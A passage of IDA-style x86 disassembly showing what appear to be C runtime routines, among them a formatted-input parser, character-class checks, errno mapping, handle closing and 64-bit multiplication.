loc_425CD3: ; CODE XREF: sub_425A04+2C2�j
test eax, eax
jz short loc_425CF8
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_425CF8
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_426460
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_425CB3
; ---------------------------------------------------------------------------
loc_425CF8: ; CODE XREF: sub_425A04+2D1�j
; sub_425A04+2DB�j
cmp byte_449A48, bl
jnz short loc_425D66
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_425D66
inc [ebp+var_4]
push edi
call sub_426460
mov ebx, eax
mov al, byte_449A48
mov [esi], al
pop ecx
mov [ebp+var_14], ebx
inc esi
loc_425D21: ; CODE XREF: sub_425A04+360�j
cmp dword_449A44, 1
jle short loc_425D36
push 4
push ebx
call sub_42653A
pop ecx
pop ecx
jmp short loc_425D41
; ---------------------------------------------------------------------------
loc_425D36: ; CODE XREF: sub_425A04+324�j
mov eax, off_449838
mov al, [eax+ebx*2]
and eax, 4
loc_425D41: ; CODE XREF: sub_425A04+330�j
test eax, eax
jz short loc_425D66
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_425D66
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_426460
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_425D21
; ---------------------------------------------------------------------------
loc_425D66: ; CODE XREF: sub_425A04+2FA�j
; sub_425A04+304�j ...
cmp [ebp+var_1C], 0
jz loc_425DFE
cmp ebx, 65h
jz short loc_425D7E
cmp ebx, 45h
jnz loc_425DFE
loc_425D7E: ; CODE XREF: sub_425A04+36F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_425DFE
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_4]
push edi
call sub_426460
mov ebx, eax
pop ecx
cmp ebx, 2Dh
mov [ebp+var_14], ebx
jnz short loc_425DA5
mov [esi], al
inc esi
jmp short loc_425DAA
; ---------------------------------------------------------------------------
loc_425DA5: ; CODE XREF: sub_425A04+39A�j
cmp ebx, 2Bh
jnz short loc_425DC8
loc_425DAA: ; CODE XREF: sub_425A04+39F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jnz short loc_425DB9
and [ebp+var_C], eax
jmp short loc_425DC8
; ---------------------------------------------------------------------------
loc_425DB9: ; CODE XREF: sub_425A04+3AE�j
; sub_425A04+3F8�j
inc [ebp+var_4]
push edi
call sub_426460
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_425DC8: ; CODE XREF: sub_425A04+3A4�j
; sub_425A04+3B3�j
cmp dword_449A44, 1
jle short loc_425DDD
push 4
push ebx
call sub_42653A
pop ecx
pop ecx
jmp short loc_425DE8
; ---------------------------------------------------------------------------
loc_425DDD: ; CODE XREF: sub_425A04+3CB�j
mov eax, off_449838
mov al, [eax+ebx*2]
and eax, 4
loc_425DE8: ; CODE XREF: sub_425A04+3D7�j
test eax, eax
jz short loc_425DFE
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_425DFE
inc [ebp+var_1C]
mov [esi], bl
inc esi
jmp short loc_425DB9
; ---------------------------------------------------------------------------
loc_425DFE: ; CODE XREF: sub_425A04+366�j
; sub_425A04+374�j ...
dec [ebp+var_4]
push edi
push ebx
call sub_42647A
cmp [ebp+var_1C], 0
pop ecx
pop ecx
jz loc_42640A
cmp [ebp+var_E], 0
jnz loc_42636B
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C4]
push eax
movsx eax, [ebp+var_D]
push [ebp+var_2C]
dec eax
push eax
call off_44BB68
add esp, 0Ch
jmp loc_42636B
; ---------------------------------------------------------------------------
loc_425E42: ; CODE XREF: sub_425A04+20C�j
cmp [ebp+var_20], eax
jnz short loc_425E51
inc [ebp+var_C]
mov [ebp+var_20], 1
loc_425E51: ; CODE XREF: sub_425A04+441�j
cmp [ebp+var_5], 0
jle short loc_425E5B
mov [ebp+var_16], 1
loc_425E5B: ; CODE XREF: sub_425A04+451�j
mov edi, offset dword_4496CC
jmp loc_425F70
; ---------------------------------------------------------------------------
loc_425E65: ; CODE XREF: sub_425A04+1FD�j
mov eax, esi
sub eax, 70h
jz loc_426113
sub eax, 3
jz loc_425F61
dec eax
dec eax
jz loc_426117
sub eax, 3
jz loc_425C4D
sub eax, 3
jz short loc_425EB3
loc_425E8F: ; CODE XREF: sub_425A04+21B�j
; sub_425A04+22E�j
movzx eax, byte ptr [ebx]
cmp eax, [ebp+var_14]
jnz loc_4263DA
dec [ebp+var_15]
cmp [ebp+var_E], 0
jnz loc_42636B
mov eax, [ebp+var_44]
mov [ebp+arg_8], eax
jmp loc_42636B
; ---------------------------------------------------------------------------
loc_425EB3: ; CODE XREF: sub_425A04+489�j
cmp [ebp+var_5], 0
jle short loc_425EBD
mov [ebp+var_16], 1
loc_425EBD: ; CODE XREF: sub_425A04+4B3�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
cmp byte ptr [edi], 5Eh
jnz loc_425F74
mov eax, edi
lea edi, [eax+1]
jmp loc_425F70
; ---------------------------------------------------------------------------
loc_425ED7: ; CODE XREF: sub_425A04+24F�j
cmp ebx, 2Bh
jnz short loc_425EFE
loc_425EDC: ; CODE XREF: sub_425A04+259�j
dec [ebp+var_C]
jnz short loc_425EED
cmp [ebp+var_20], 0
jz short loc_425EED
mov [ebp+var_F], 1
jmp short loc_425EFE
; ---------------------------------------------------------------------------
loc_425EED: ; CODE XREF: sub_425A04+4DB�j
; sub_425A04+4E1�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_426460
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_425EFE: ; CODE XREF: sub_425A04+4D6�j
; sub_425A04+4E7�j
cmp ebx, 30h
jnz loc_42614C
push [ebp+arg_0]
inc [ebp+var_4]
call sub_426460
mov ebx, eax
pop ecx
cmp bl, 78h
mov [ebp+var_14], ebx
jz short loc_425F4C
cmp bl, 58h
jz short loc_425F4C
cmp esi, 78h
mov [ebp+var_1C], 1
jz short loc_425F36
push 6Fh
loc_425F30: ; CODE XREF: sub_425A04+55B�j
pop esi
jmp loc_42614C
; ---------------------------------------------------------------------------
loc_425F36: ; CODE XREF: sub_425A04+528�j
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_42647A
pop ecx
pop ecx
push 30h
pop ebx
jmp loc_426149
; ---------------------------------------------------------------------------
loc_425F4C: ; CODE XREF: sub_425A04+517�j
; sub_425A04+51C�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_426460
pop ecx
mov ebx, eax
mov [ebp+var_14], ebx
push 78h
jmp short loc_425F30
; ---------------------------------------------------------------------------
loc_425F61: ; CODE XREF: sub_425A04+46F�j
cmp [ebp+var_5], 0
jle short loc_425F6B
mov [ebp+var_16], 1
loc_425F6B: ; CODE XREF: sub_425A04+561�j
mov edi, offset dword_4496C4
loc_425F70: ; CODE XREF: sub_425A04+45C�j
; sub_425A04+4CE�j
or [ebp+var_18], 0FFh
loc_425F74: ; CODE XREF: sub_425A04+4C3�j
push 20h
lea eax, [ebp+var_64]
push 0
push eax
call sub_4221F0
add esp, 0Ch
cmp [ebp+var_3C], 7Bh
jnz short loc_425F98
cmp byte ptr [edi], 5Dh
jnz short loc_425F98
mov dl, 5Dh
inc edi
mov [ebp+var_59], 20h
jmp short loc_425F9B
; ---------------------------------------------------------------------------
loc_425F98: ; CODE XREF: sub_425A04+584�j
; sub_425A04+589�j
mov dl, [ebp+var_35]
loc_425F9B: ; CODE XREF: sub_425A04+592�j
; sub_425A04+5E1�j ...
mov al, [edi]
cmp al, 5Dh
jz short loc_426000
inc edi
cmp al, 2Dh
jnz short loc_425FE7
test dl, dl
jz short loc_425FE7
mov cl, [edi]
cmp cl, 5Dh
jz short loc_425FE7
inc edi
cmp dl, cl
jnb short loc_425FBA
mov al, cl
jmp short loc_425FBE
; ---------------------------------------------------------------------------
loc_425FBA: ; CODE XREF: sub_425A04+5B0�j
mov al, dl
mov dl, cl
loc_425FBE: ; CODE XREF: sub_425A04+5B4�j
cmp dl, al
ja short loc_425FE3
movzx edx, dl
movzx esi, al
sub esi, edx
inc esi
loc_425FCB: ; CODE XREF: sub_425A04+5DD�j
mov ecx, edx
mov eax, edx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
inc edx
dec esi
jnz short loc_425FCB
loc_425FE3: ; CODE XREF: sub_425A04+5BC�j
xor dl, dl
jmp short loc_425F9B
; ---------------------------------------------------------------------------
loc_425FE7: ; CODE XREF: sub_425A04+5A0�j
; sub_425A04+5A4�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
jmp short loc_425F9B
; ---------------------------------------------------------------------------
loc_426000: ; CODE XREF: sub_425A04+59B�j
cmp byte ptr [edi], 0
jz loc_42640A
cmp [ebp+var_3C], 7Bh
jnz short loc_426012
mov [ebp+arg_4], edi
loc_426012: ; CODE XREF: sub_425A04+609�j
mov edi, [ebp+arg_0]
mov esi, [ebp+var_2C]
dec [ebp+var_4]
push edi
push [ebp+var_14]
mov [ebp+var_30], esi
call sub_42647A
pop ecx
pop ecx
loc_426029: ; CODE XREF: sub_425A04+6BC�j
; sub_425A04+6C4�j
cmp [ebp+var_20], 0
jz short loc_42603D
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz loc_4260D9
loc_42603D: ; CODE XREF: sub_425A04+629�j
inc [ebp+var_4]
push edi
call sub_426460
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jz short loc_4260CD
mov ecx, eax
push 1
and ecx, 7
pop edx
movsx ebx, [ebp+var_18]
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+var_64]
xor ecx, ebx
test edx, ecx
jz short loc_4260CD
cmp [ebp+var_E], 0
jnz short loc_4260C5
cmp [ebp+var_16], 0
jz short loc_4260BA
mov ecx, off_449838
mov [ebp+var_38], al
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_426099
inc [ebp+var_4]
push edi
call sub_426460
pop ecx
mov [ebp+var_37], al
loc_426099: ; CODE XREF: sub_425A04+686�j
push dword_449A44
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_3E]
push eax
call sub_42B920
mov ax, [ebp+var_3E]
add esp, 0Ch
mov [esi], ax
inc esi
inc esi
jmp short loc_4260BD
; ---------------------------------------------------------------------------
loc_4260BA: ; CODE XREF: sub_425A04+673�j
mov [esi], al
inc esi
loc_4260BD: ; CODE XREF: sub_425A04+6B4�j
mov [ebp+var_2C], esi
jmp loc_426029
; ---------------------------------------------------------------------------
loc_4260C5: ; CODE XREF: sub_425A04+66D�j
inc [ebp+var_30]
jmp loc_426029
; ---------------------------------------------------------------------------
loc_4260CD: ; CODE XREF: sub_425A04+649�j
; sub_425A04+667�j
dec [ebp+var_4]
push edi
push eax
call sub_42647A
pop ecx
pop ecx
loc_4260D9: ; CODE XREF: sub_425A04+633�j
cmp [ebp+var_30], esi
jz loc_42640A
cmp [ebp+var_E], 0
jnz loc_42636B
inc [ebp+var_34]
cmp [ebp+var_3C], 63h
jz loc_42636B
cmp [ebp+var_16], 0
mov eax, [ebp+var_2C]
jz short loc_42610B
and word ptr [eax], 0
jmp loc_42636B
; ---------------------------------------------------------------------------
loc_42610B: ; CODE XREF: sub_425A04+6FC�j
and byte ptr [eax], 0
jmp loc_42636B
; ---------------------------------------------------------------------------
loc_426113: ; CODE XREF: sub_425A04+466�j
mov [ebp+var_D], 1
loc_426117: ; CODE XREF: sub_425A04+203�j
; sub_425A04+215�j ...
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz short loc_426125
mov [ebp+var_17], 1
jmp short loc_42612A
; ---------------------------------------------------------------------------
loc_426125: ; CODE XREF: sub_425A04+719�j
cmp ebx, 2Bh
jnz short loc_42614C
loc_42612A: ; CODE XREF: sub_425A04+71F�j
dec [ebp+var_C]
jnz short loc_42613B
cmp [ebp+var_20], 0
jz short loc_42613B
mov [ebp+var_F], 1
jmp short loc_42614C
; ---------------------------------------------------------------------------
loc_42613B: ; CODE XREF: sub_425A04+729�j
; sub_425A04+72F�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_426460
pop ecx
mov ebx, eax
loc_426149: ; CODE XREF: sub_425A04+543�j
mov [ebp+var_14], ebx
loc_42614C: ; CODE XREF: sub_425A04+4FD�j
; sub_425A04+52D�j ...
cmp [ebp+var_30], 0
jz loc_426265
cmp [ebp+var_F], 0
jnz loc_426243
loc_426160: ; CODE XREF: sub_425A04+82C�j
cmp esi, 78h
jnz short loc_4261B4
cmp dword_449A44, 1
jle short loc_42617D
push 80h
push ebx
call sub_42653A
pop ecx
pop ecx
jmp short loc_42618A
; ---------------------------------------------------------------------------
loc_42617D: ; CODE XREF: sub_425A04+768�j
mov eax, off_449838
mov al, [eax+ebx*2]
and eax, 80h
loc_42618A: ; CODE XREF: sub_425A04+777�j
test eax, eax
jz loc_426235
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 4
pop ecx
call sub_42BA50
push ebx
mov [ebp+var_28], eax
mov [ebp+var_24], edx
call sub_426429
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_426207
; ---------------------------------------------------------------------------
loc_4261B4: ; CODE XREF: sub_425A04+75F�j
cmp dword_449A44, 1
jle short loc_4261C9
push 4
push ebx
call sub_42653A
pop ecx
pop ecx
jmp short loc_4261D4
; ---------------------------------------------------------------------------
loc_4261C9: ; CODE XREF: sub_425A04+7B7�j
mov eax, off_449838
mov al, [eax+ebx*2]
and eax, 4
loc_4261D4: ; CODE XREF: sub_425A04+7C3�j
test eax, eax
jz short loc_426235
cmp esi, 6Fh
jnz short loc_4261F2
cmp ebx, 38h
jge short loc_426235
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 3
pop ecx
call sub_42BA50
jmp short loc_426201
; ---------------------------------------------------------------------------
loc_4261F2: ; CODE XREF: sub_425A04+7D7�j
push 0
push 0Ah
push [ebp+var_24]
push [ebp+var_28]
call sub_4265B0
loc_426201: ; CODE XREF: sub_425A04+7EC�j
mov [ebp+var_28], eax
mov [ebp+var_24], edx
loc_426207: ; CODE XREF: sub_425A04+7AE�j
inc [ebp+var_1C]
lea eax, [ebx-30h]
cdq
add [ebp+var_28], eax
adc [ebp+var_24], edx
cmp [ebp+var_20], 0
jz short loc_42621F
dec [ebp+var_C]
jz short loc_426243
loc_42621F: ; CODE XREF: sub_425A04+814�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_426460
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_426160
; ---------------------------------------------------------------------------
loc_426235: ; CODE XREF: sub_425A04+788�j
; sub_425A04+7D2�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_42647A
pop ecx
pop ecx
loc_426243: ; CODE XREF: sub_425A04+756�j
; sub_425A04+819�j
cmp [ebp+var_17], 0
jz loc_426329
mov eax, [ebp+var_28]
mov ecx, [ebp+var_24]
neg eax
adc ecx, 0
mov [ebp+var_28], eax
neg ecx
mov [ebp+var_24], ecx
jmp loc_426329
; ---------------------------------------------------------------------------
loc_426265: ; CODE XREF: sub_425A04+74C�j
cmp [ebp+var_F], 0
jnz loc_426321
loc_42626F: ; CODE XREF: sub_425A04+90A�j
cmp esi, 78h
jz short loc_4262B3
cmp esi, 70h
jz short loc_4262B3
cmp dword_449A44, 1
jle short loc_42628E
push 4
push ebx
call sub_42653A
pop ecx
pop ecx
jmp short loc_426299
; ---------------------------------------------------------------------------
loc_42628E: ; CODE XREF: sub_425A04+87C�j
mov eax, off_449838
mov al, [eax+ebx*2]
and eax, 4
loc_426299: ; CODE XREF: sub_425A04+888�j
test eax, eax
jz short loc_426313
cmp esi, 6Fh
jnz short loc_4262AC
cmp ebx, 38h
jge short loc_426313
shl edi, 3
jmp short loc_4262EB
; ---------------------------------------------------------------------------
loc_4262AC: ; CODE XREF: sub_425A04+89C�j
lea edi, [edi+edi*4]
shl edi, 1
jmp short loc_4262EB
; ---------------------------------------------------------------------------
loc_4262B3: ; CODE XREF: sub_425A04+86E�j
; sub_425A04+873�j
cmp dword_449A44, 1
jle short loc_4262CB
push 80h
push ebx
call sub_42653A
pop ecx
pop ecx
jmp short loc_4262D8
; ---------------------------------------------------------------------------
loc_4262CB: ; CODE XREF: sub_425A04+8B6�j
mov eax, off_449838
mov al, [eax+ebx*2]
and eax, 80h
loc_4262D8: ; CODE XREF: sub_425A04+8C5�j
test eax, eax
jz short loc_426313
push ebx
shl edi, 4
call sub_426429
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_4262EB: ; CODE XREF: sub_425A04+8A6�j
; sub_425A04+8AD�j
inc [ebp+var_1C]
cmp [ebp+var_20], 0
lea edi, [edi+ebx-30h]
jz short loc_4262FD
dec [ebp+var_C]
jz short loc_426321
loc_4262FD: ; CODE XREF: sub_425A04+8F2�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_426460
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_42626F
; ---------------------------------------------------------------------------
loc_426313: ; CODE XREF: sub_425A04+897�j
; sub_425A04+8A1�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_42647A
pop ecx
pop ecx
loc_426321: ; CODE XREF: sub_425A04+865�j
; sub_425A04+8F7�j
cmp [ebp+var_17], 0
jz short loc_426329
neg edi
loc_426329: ; CODE XREF: sub_425A04+843�j
; sub_425A04+85C�j ...
cmp esi, 46h
jnz short loc_426332
and [ebp+var_1C], 0
loc_426332: ; CODE XREF: sub_425A04+928�j
cmp [ebp+var_1C], 0
jz loc_42640A
cmp [ebp+var_E], 0
jnz short loc_42636B
inc [ebp+var_34]
loc_426345: ; CODE XREF: sub_425A04+23B�j
cmp [ebp+var_30], 0
jz short loc_42635B
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov ecx, [ebp+var_24]
mov [eax+4], ecx
jmp short loc_42636B
; ---------------------------------------------------------------------------
loc_42635B: ; CODE XREF: sub_425A04+945�j
cmp [ebp+var_D], 0
mov eax, [ebp+var_2C]
jz short loc_426368
mov [eax], edi
jmp short loc_42636B
; ---------------------------------------------------------------------------
loc_426368: ; CODE XREF: sub_425A04+95E�j
mov [eax], di
loc_42636B: ; CODE XREF: sub_425A04+241�j
; sub_425A04+414�j ...
inc [ebp+var_15]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_4263B8
; ---------------------------------------------------------------------------
loc_426376: ; CODE XREF: sub_425A04+93�j
inc [ebp+var_4]
push edi
call sub_426460
mov ebx, eax
pop ecx
movzx eax, byte ptr [esi]
inc esi
cmp eax, ebx
mov [ebp+var_14], ebx
mov [ebp+arg_4], esi
jnz short loc_4263E5
mov ecx, off_449838
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_4263B8
inc [ebp+var_4]
push edi
call sub_426460
pop ecx
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, eax
mov [ebp+arg_4], esi
jnz short loc_4263F3
dec [ebp+var_4]
loc_4263B8: ; CODE XREF: sub_425A04+970�j
; sub_425A04+99A�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_4263CE
cmp byte ptr [esi], 25h
jnz short loc_426410
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_426410
mov esi, eax
loc_4263CE: ; CODE XREF: sub_425A04+9B8�j
mov al, [esi]
test al, al
jnz loc_425A2E
jmp short loc_42640A
; ---------------------------------------------------------------------------
loc_4263DA: ; CODE XREF: sub_425A04+1F4�j
; sub_425A04+491�j
push [ebp+arg_0]
dec [ebp+var_4]
push [ebp+var_14]
jmp short loc_4263EA
; ---------------------------------------------------------------------------
loc_4263E5: ; CODE XREF: sub_425A04+98A�j
dec [ebp+var_4]
push edi
push ebx
loc_4263EA: ; CODE XREF: sub_425A04+9DF�j
call sub_42647A
pop ecx
pop ecx
jmp short loc_42640A
; ---------------------------------------------------------------------------
loc_4263F3: ; CODE XREF: sub_425A04+9AF�j
dec [ebp+var_4]
push edi
push eax
call sub_42647A
dec [ebp+var_4]
push edi
push ebx
call sub_42647A
add esp, 10h
loc_42640A: ; CODE XREF: sub_425A04+1F�j
; sub_425A04+40A�j ...
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_426421
loc_426410: ; CODE XREF: sub_425A04+9BD�j
; sub_425A04+9C6�j
mov eax, [ebp+var_34]
test eax, eax
jnz short loc_426424
cmp [ebp+var_15], al
jnz short loc_426424
or eax, 0FFFFFFFFh
jmp short loc_426424
; ---------------------------------------------------------------------------
loc_426421: ; CODE XREF: sub_425A04+A0A�j
mov eax, [ebp+var_34]
loc_426424: ; CODE XREF: sub_425A04+A11�j
; sub_425A04+A16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_425A04 endp
; =============== S U B R O U T I N E =======================================
sub_426429 proc near ; CODE XREF: sub_425A04+7A3�p
; sub_425A04+8DC�p
arg_0 = dword ptr 4
cmp dword_449A44, 1
push esi
jle short loc_426443
mov esi, [esp+4+arg_0]
push 4
push esi
call sub_42653A
pop ecx
pop ecx
jmp short loc_426452
; ---------------------------------------------------------------------------
loc_426443: ; CODE XREF: sub_426429+8�j
mov esi, [esp+4+arg_0]
mov eax, off_449838
mov al, [eax+esi*2]
and eax, 4
loc_426452: ; CODE XREF: sub_426429+18�j
test eax, eax
jnz short loc_42645C
and esi, 0FFFFFFDFh
sub esi, 7
loc_42645C: ; CODE XREF: sub_426429+2B�j
mov eax, esi
pop esi
retn
sub_426429 endp
; =============== S U B R O U T I N E =======================================
sub_426460 proc near ; CODE XREF: sub_425A04+1E1�p
; sub_425A04+289�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
dec dword ptr [edx+4]
js short loc_426472
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_426472: ; CODE XREF: sub_426460+7�j
push edx
call sub_426826
pop ecx
retn
sub_426460 endp
; =============== S U B R O U T I N E =======================================
sub_42647A proc near ; CODE XREF: sub_425A04+6B�p
; sub_425A04+3FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFFFh
jz short locret_426490
push [esp+arg_4]
push [esp+4+arg_0]
call sub_42BA6F
pop ecx
pop ecx
locret_426490: ; CODE XREF: sub_42647A+5�j
retn
sub_42647A endp
; =============== S U B R O U T I N E =======================================
sub_426491 proc near ; CODE XREF: sub_425A04+63�p
; sub_425A04+1D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
loc_426497: ; CODE XREF: sub_426491+1D�j
push [esp+8+arg_4]
inc dword ptr [esi]
call sub_426460
mov edi, eax
push edi
call sub_423378
pop ecx
test eax, eax
pop ecx
jnz short loc_426497
mov eax, edi
pop edi
pop esi
retn
sub_426491 endp
; =============== S U B R O U T I N E =======================================
sub_4264B5 proc near ; CODE XREF: sub_424450+16�p
; sub_426641+73�p ...
arg_0 = dword ptr 4
push esi
call sub_426531
mov ecx, [esp+4+arg_0]
xor esi, esi
mov [eax], ecx
mov eax, offset dword_4496D0
loc_4264C8: ; CODE XREF: sub_4264B5+20�j
cmp ecx, [eax]
jz short loc_4264EE
add eax, 8
inc esi
cmp eax, offset off_449838
jl short loc_4264C8
cmp ecx, 13h
jb short loc_4264FE
cmp ecx, 24h
ja short loc_4264FE
call sub_426528
mov dword ptr [eax], 0Dh
pop esi
retn
; ---------------------------------------------------------------------------
loc_4264EE: ; CODE XREF: sub_4264B5+15�j
call sub_426528
mov ecx, dword_4496D4[esi*8]
pop esi
mov [eax], ecx
retn
; ---------------------------------------------------------------------------
loc_4264FE: ; CODE XREF: sub_4264B5+25�j
; sub_4264B5+2A�j
cmp ecx, 0BCh
jb short loc_42651B
cmp ecx, 0CAh
ja short loc_42651B
call sub_426528
mov dword ptr [eax], 8
pop esi
retn
; ---------------------------------------------------------------------------
loc_42651B: ; CODE XREF: sub_4264B5+4F�j
; sub_4264B5+57�j
call sub_426528
mov dword ptr [eax], 16h
pop esi
retn
sub_4264B5 endp
; =============== S U B R O U T I N E =======================================
sub_426528 proc near ; CODE XREF: sub_4228B3:loc_422A65�p
; sub_422D1B+83�p ...
call sub_42599D
add eax, 8
retn
sub_426528 endp
; =============== S U B R O U T I N E =======================================
sub_426531 proc near ; CODE XREF: sub_424450+36�p
; sub_4264B5+1�p ...
call sub_42599D
add eax, 0Ch
retn
sub_426531 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42653A proc near ; CODE XREF: sub_4228B3+27�p
; sub_4228B3+E4�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_426558
mov ecx, off_449838
movzx eax, word ptr [ecx+eax*2]
jmp short loc_4265AA
; ---------------------------------------------------------------------------
loc_426558: ; CODE XREF: sub_42653A+10�j
mov ecx, eax
push esi
mov esi, off_449838
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_42657D
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_426586
; ---------------------------------------------------------------------------
loc_42657D: ; CODE XREF: sub_42653A+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_426586: ; CODE XREF: sub_42653A+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_42BADD
add esp, 1Ch
test eax, eax
jnz short loc_4265A6
leave
retn
; ---------------------------------------------------------------------------
loc_4265A6: ; CODE XREF: sub_42653A+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_4265AA: ; CODE XREF: sub_42653A+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_42653A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4265B0 proc near ; CODE XREF: sub_425A04+7F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_4265C9
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_4265C9: ; CODE XREF: sub_4265B0+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_4265B0 endp
; =============== S U B R O U T I N E =======================================
sub_4265E4 proc near ; CODE XREF: sub_41186E+10F�p
; sub_41186E+159�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_631AE0
jnb short loc_426629
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_6319E0[ecx*4]
lea eax, [eax+eax*8]
test byte ptr [ecx+eax*4+4], 1
jz short loc_426629
push edi
push esi
call sub_42BE86
push esi
call sub_426641
push esi
mov edi, eax
call sub_42BEE5
add esp, 0Ch
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_426629: ; CODE XREF: sub_4265E4+B�j
; sub_4265E4+26�j
call sub_426528
mov dword ptr [eax], 9
call sub_426531
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
pop esi
retn
sub_4265E4 endp
; =============== S U B R O U T I N E =======================================
sub_426641 proc near ; CODE XREF: sub_4265E4+30�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_42BE44
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_42668F
cmp esi, 1
jz short loc_42665D
cmp esi, 2
jnz short loc_426673
loc_42665D: ; CODE XREF: sub_426641+15�j
push 2
call sub_42BE44
push 1
mov edi, eax
call sub_42BE44
pop ecx
cmp eax, edi
pop ecx
jz short loc_42668F
loc_426673: ; CODE XREF: sub_426641+1A�j
push esi
call sub_42BE44
pop ecx
push eax
call dword_42F038 ; CloseHandle
test eax, eax
jnz short loc_42668F
call dword_42F068 ; RtlGetLastWin32Error
mov edi, eax
jmp short loc_426691
; ---------------------------------------------------------------------------
loc_42668F: ; CODE XREF: sub_426641+10�j
; sub_426641+30�j ...
xor edi, edi
loc_426691: ; CODE XREF: sub_426641+4C�j
push esi
call sub_42BDC5
mov eax, esi
and esi, 1Fh
sar eax, 5
pop ecx
mov eax, dword_6319E0[eax*4]
lea ecx, [esi+esi*8]
and byte ptr [eax+ecx*4+4], 0
test edi, edi
jz short loc_4266BF
push edi
call sub_4264B5
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_4266C1
; ---------------------------------------------------------------------------
loc_4266BF: ; CODE XREF: sub_426641+70�j
xor eax, eax
loc_4266C1: ; CODE XREF: sub_426641+7C�j
pop edi
pop esi
retn
sub_426641 endp
; =============== S U B R O U T I N E =======================================
sub_4266C4 proc near ; CODE XREF: sub_422B96+18�p
arg_0 = dword ptr 4
push esi
